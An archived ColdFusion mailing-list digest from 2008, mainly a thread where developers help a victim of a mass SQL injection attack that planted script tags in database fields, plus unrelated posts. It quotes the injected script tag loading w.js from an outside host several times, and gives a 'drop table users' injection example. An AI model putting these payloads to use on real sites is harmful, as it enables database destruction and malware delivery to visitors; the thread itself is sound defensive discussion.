HELP! SQL Injection Attack!
Im a coldfusion noobs and my database just got injected with some script. So for example one of the database field would appear something like so: Gisella427.jpg/titlescript src=http://jjmaoduo.3322.org/csrss/w.js;/script!-- I've tried updating the records using a replace command on the fields, but 20mins later this code pop up again!!! Any idea on how to fix or prevent this from happening Seriously out of idea here ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310330 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
There are a number of things you can do, and in fact i use all of these - [A] Find out this person's ip address, and if the form is submitted from that ip address, do nothing. Don't give them any kind of feedback at all.That'll stop this current attack, but since these idiots usually dart from one ip address to another, it's not enough to fix the problem. Only stop today's . You can find out the ip address by having you form submit #cgi.remote_addr# in a hidden field. [B] pass the form's submitted contents through a regex to eliminate any html. You can get all kinds of string manipulation scripts through the library at cflib.org, including one to strip out any html [C] use cfformprotect, which (amongst other things) compares the submission in this form wiht a database of other form submissions from other sites, and identifying which ones are spam and which arent. When it tells you this is spam, you just throw it away. Dont tell the spammer you're throwing it away, because that only helps them refine their techniques. Those buggers are agile enough as it is without us giving them a helping hand. You can get cfformprotect form http://www.riaforge.org/ . [D] while you're working in this area, you should make sure you're using cfqueryparam if you're processing the form into your database. I konw you havent described a SQL injection, but it's not a million miles away from what you do describe. There's ample documentation in the ColdFusion docs about cfqueryparam and there have been quite a few blog articles about it lately. Google for cfqueryparam and ColdFusion and you'll find them. Using cfqueryparam on every (and i do mean EVERY) parameter you insert into the database, on every insert or update if there is likely to be any user input going in that SQL statement.That ensures that you wont get anyone able to enter a last name as 'Smith)';drop table users' or some such. I started defending my sites from this kind of script when i had a guestbook on a very low volume suddenly get 30,000 entries waiting for editor approval, all with links to sites we might want to go and see, just like yours has. Using the techniques i described reduced the flow from thousands a day to a more likely 3-4 a week on this little site. Hope this helps. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto [EMAIL PROTECTED] wrote: Im a coldfusion noobs and my database just got injected with some script. So for example one of the database field would appear something like so: Gisella427.jpg/titlescript src=http://jjmaoduo.3322.org/csrss/w.js;/script!-- I've tried updating the records using a replace command on the fields, but 20mins later this code pop up again!!! Any idea on how to fix or prevent this from happening Seriously out of idea here ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310331 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
It appears we've been attacked by this last night / this morning too. Will update here with more info when we have it. Dominic 2008/8/7 Mike Kear [EMAIL PROTECTED]: There are a number of things you can do, and in fact i use all of these - [A] Find out this person's ip address, and if the form is submitted from that ip address, do nothing. Don't give them any kind of feedback at all.That'll stop this current attack, but since these idiots usually dart from one ip address to another, it's not enough to fix the problem. Only stop today's . You can find out the ip address by having you form submit #cgi.remote_addr# in a hidden field. [B] pass the form's submitted contents through a regex to eliminate any html. You can get all kinds of string manipulation scripts through the library at cflib.org, including one to strip out any html [C] use cfformprotect, which (amongst other things) compares the submission in this form wiht a database of other form submissions from other sites, and identifying which ones are spam and which arent. When it tells you this is spam, you just throw it away. Dont tell the spammer you're throwing it away, because that only helps them refine their techniques. Those buggers are agile enough as it is without us giving them a helping hand. You can get cfformprotect form http://www.riaforge.org/ . [D] while you're working in this area, you should make sure you're using cfqueryparam if you're processing the form into your database. I konw you havent described a SQL injection, but it's not a million miles away from what you do describe. There's ample documentation in the ColdFusion docs about cfqueryparam and there have been quite a few blog articles about it lately. Google for cfqueryparam and ColdFusion and you'll find them. Using cfqueryparam on every (and i do mean EVERY) parameter you insert into the database, on every insert or update if there is likely to be any user input going in that SQL statement.That ensures that you wont get anyone able to enter a last name as 'Smith)';drop table users' or some such. I started defending my sites from this kind of script when i had a guestbook on a very low volume suddenly get 30,000 entries waiting for editor approval, all with links to sites we might want to go and see, just like yours has. Using the techniques i described reduced the flow from thousands a day to a more likely 3-4 a week on this little site. Hope this helps. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto [EMAIL PROTECTED] wrote: Im a coldfusion noobs and my database just got injected with some script. So for example one of the database field would appear something like so: Gisella427.jpg/titlescript src=http://jjmaoduo.3322.org/csrss/w.js;/script!-- I've tried updating the records using a replace command on the fields, but 20mins later this code pop up again!!! Any idea on how to fix or prevent this from happening Seriously out of idea here ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310332 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: XMLSearch not thread safe
On Wednesday 06 Aug 2008, Brad Wood wrote: iframes aren't good for load testing. Browsers like IE follow spec and only allow 2 concurrent connections to a server at once. Even IE lets you adjust this number in the registry, but I use Apache JMeter tbh. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310333 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: weird CF8 behavior
On Wednesday 06 Aug 2008, jw wrote: Has anyone ever encountered a weird issue where you get a CF file not found errors for Application.cfc or index.cfm when they are clearly part of the application. I get this on my production server and turning off template caching solves the problem. Though not really a great solution. Maybe you need to raise the ulimit (or whatever MacOS has renamed that part of *nix too). -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310334 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Mac Users Beware! - Security Update 2008-005 (Intel) stopped Apache talking to CF8
Yesterday I installed Security Update 2008-005 (Intel) on my MacBook Pro and Apache wouldn't talk to ColdFusion 8 any more! I'm not Mac savvy enough to understand why, but it had something to do with paths. Symptoms were very confusing and caused many hours of head scratching. It wasn't starting Apache from it's application root folder. (I still have Apache 1.3 which came installed with OSX 10.4 hanging around the system). Something to do with my setup caused it not to load the httpd.conf file properly (and possibly envvars?)! It seemed to be loading it although I think it was loading other conf files first which I think caused it not to load the jrun module. I could still get to my virtual hosts, but just saw cfm files as plain text! This was my fix anyway. I changed my startup script from: sudo /apache2/bin/apachectl start to: cd /apache2/bin sudo ./apachectl start That fixed it. I would love to know the root cause. I understand that my fix explicitly starts Apache2 from it's application root and therefore it finds all its resources correctly. I don't understand what changed on my system. If anyone could help me solve what happened that would be great. The pain of losing several hours will be easier to bare if I actually learn something from it. Thanks, Matt ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310335 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dominic Watson wrote: It appears we've been attacked by this last night / this morning too. Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310336 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnarable queries. Dominic 2008/8/7 Tom Chiverton [EMAIL PROTECTED]: On Thursday 07 Aug 2008, Dominic Watson wrote: It appears we've been attacked by this last night / this morning too. Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310337 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: help!! = ColdFusion.Window.create Refresh
Torsten, This was an issue and has been fixed in 8.0.1. I did a quick check on it and it works fine for me. Are you on 8.0.1? Charlie, Make sure that you use the right case when you use refreshOnShow in JavaScript as JS is case sensitive. Can you share the code that does not seem to work? -Original Message- From: Charlie Griefer [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:19 AM To: CF-Talk Subject: Re: help!! = ColdFusion.Window.create Refresh i'd heard (on this list) that as of 8.01, refreshonshow worked for cfwindows created via the create method... but i've not been able to get it to work :\ my workaround was to pass a unique value to the js function that created the window, and use that as the window name. On Wed, Aug 6, 2008 at 8:43 PM, Shirzad Khusrokhan [EMAIL PROTECTED]wrote: I can't get windowOptions.refreshOnShow = true; to work either. Does anyone have a workaround? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310338 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dominic Watson wrote: Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnarable queries. It's sad but true that security holes are never seen as important until it's (almost) too late. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310339 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310340 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: HELP! SQL Injection Attack!
Im a coldfusion noobs and my database just got injected with some script. So for example one of the database field would appear something like so: Gisella427.jpg/titlescript src=http://jjmaoduo.3322.org/csrss/w.js;/script!-- I've tried updating the records using a replace command on the fields, but 20mins later this code pop up again!!! Any idea on how to fix or prevent this from happening Seriously out of idea here Use CFQUERYPARAM around all user-submitted query values. http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html This specific issue came up on the list repeatedly over the last few weeks, so you might want to check the list archives. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310341 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing i THOUGHT he was describing. I've been able to almost eliminate spam entries from my gurestbook/contact us forms (ok i havent almost eliminated , lets say dramatically reduced then) across my sites. On one client's site for example, their guestook was choking to death with thousands of entries all spam, and now it's fewer than 5-6 spam entries a month.I have a database of 9600 or so ip addresses that i wont accept input from on any of my sites. As time goes on it gets more and more effective. Anyway, whatever solves the Michael's problem I feel sure is going to be a combination of things, not just the one. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts [EMAIL PROTECTED] wrote: I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310342 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Dave Watts wrote: Use CFQUERYPARAM around all user-submitted query values. And htmlEditFormat() around places where database data is output to the end user. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310343 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
If you have the option, that'd be much more efficient at the network level than in the app and would filter the IPs for all apps at once. It might get more 'effective' the larger it gets but it also gets less efficient. The solution is to filter all input from users with something like cfqueryparam. The only reason to combine that with another solution is to filter data that made it in already... and like Tom said, simply formatting the data with htmledit on display will render the script/html as useless plain text. Not to get on a rant either but... 5-6 successful spam submissions per month is 5-6 too many in my opinion. There are too many simple solutions to 99.9% of them. It used to be that 1 would send a developer on a frenzied mission to stop it; now they are so abundant that people are becoming ok with 5 or 6 a month? Come on... if you don't filter your user content, the terrorists win. ;-) ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 7:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing i THOUGHT he was describing. I've been able to almost eliminate spam entries from my gurestbook/contact us forms (ok i havent almost eliminated , lets say dramatically reduced then) across my sites. On one client's site for example, their guestook was choking to death with thousands of entries all spam, and now it's fewer than 5-6 spam entries a month.I have a database of 9600 or so ip addresses that i wont accept input from on any of my sites. As time goes on it gets more and more effective. Anyway, whatever solves the Michael's problem I feel sure is going to be a combination of things, not just the one. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts [EMAIL PROTECTED] wrote: I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310344 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Last chance to sign up for Hands On CSS Class
4 DAY HANDS ON CSS CLASS August 18-21st, 2008, Fairfax Virginia. Cost $1,399 per person. Do you want to learn about CSS? Are you someone who is just getting started with CSS who is finding it incredibly frustrating? Or someone who has used it for a while, but still can't get positioning and floating behaviors to do what you want? I can help you. This 4 day class is given from a programmers perspective rather than a designer. Its meant to let you understand why things happen the way they do rather than simply Oooh, see how pretty I can make it. Learn the 9 rules of Floats, the differences in the positioning models. How using inline display types is different than floats. Learn about typography and cross browser issues. I do not give this class very often publicly. Chances are if you miss this class I will not be giving it for at least a year. If you are interested in this class, email me. A copy of the syllabus is located at: http://www.shayna.com/index.cfm?fuseaction=training.syllabus_displayid=1 I accept paypal, corporate checks and money orders/cashiers checks. Sandra Clark = http://www.shayna.com Training and Consulting in CSS and Accessibility Team Fusebox ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310345 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Java Book Recommendations?
Will, Definitely check out Java for ColdFusion developers by Eben Hewitt. By far the easiest book for a CF'er to grasp Java. Rick Mason Thanks much Rick! I'll check it out! Will ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310346 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
On Thursday 07 Aug 2008, Bobby Hartsfield wrote: The solution is to filter all input from users with something like cfqueryparam. The only reason to combine that with another solution is to filter data that made it in already... and like Tom said, Ahh, no, not the only reason. Support I enter JavaScript as my 'name' in a blog comment form. cfqp will let that pass (it's text, in a text field, with a text cf_sql_type) but you still want to htmlEditFormat() on output. -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310347 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Newb AJAX question
Thanks Tom, my JS is really weak... can you point me to some resources online that would walk me through this? Bret On Tuesday 29 Jul 2008, Bret McDermitt wrote: right on the money. If I could generate that key based on the domain name being passed to my server using AJAX and then send that to the iframe src, that'd be perfect. Have the JavaScript on the host request a token from your server, combine it with their IP/domain name, and send it along with the IFRAME URL ? -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310348 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Michael, I have about 5 posts on this issue: http://www.coldfusionmuse.com Starting with this one... http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A SCII There's no magic bullet. The basic procedure is going to be to implement a blacklist function to prevent the attack (this is a first level defense to give you some breathing room), restore your DB or fix it with one of the several scripts running around, then go through your code and examine all the queries and add cfqueryparam, then look at where you are handling form inputs and validate what users have given you, then work on scrubbing anything that is given by the user that is output to the page (to prevent xss). Basically, other than the blacklist function (about which there are a variety of opinions) all of these steps aught to be followed regularly as your de facto coding standard. -Mark -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 6:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing i THOUGHT he was describing. I've been able to almost eliminate spam entries from my gurestbook/contact us forms (ok i havent almost eliminated , lets say dramatically reduced then) across my sites. On one client's site for example, their guestook was choking to death with thousands of entries all spam, and now it's fewer than 5-6 spam entries a month.I have a database of 9600 or so ip addresses that i wont accept input from on any of my sites. As time goes on it gets more and more effective. Anyway, whatever solves the Michael's problem I feel sure is going to be a combination of things, not just the one. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts [EMAIL PROTECTED] wrote: I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet, I think. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310349 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Anyway, whatever solves the Michael's problem I feel sure is going to be a combination of things, not just the one. Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy. -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310350 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
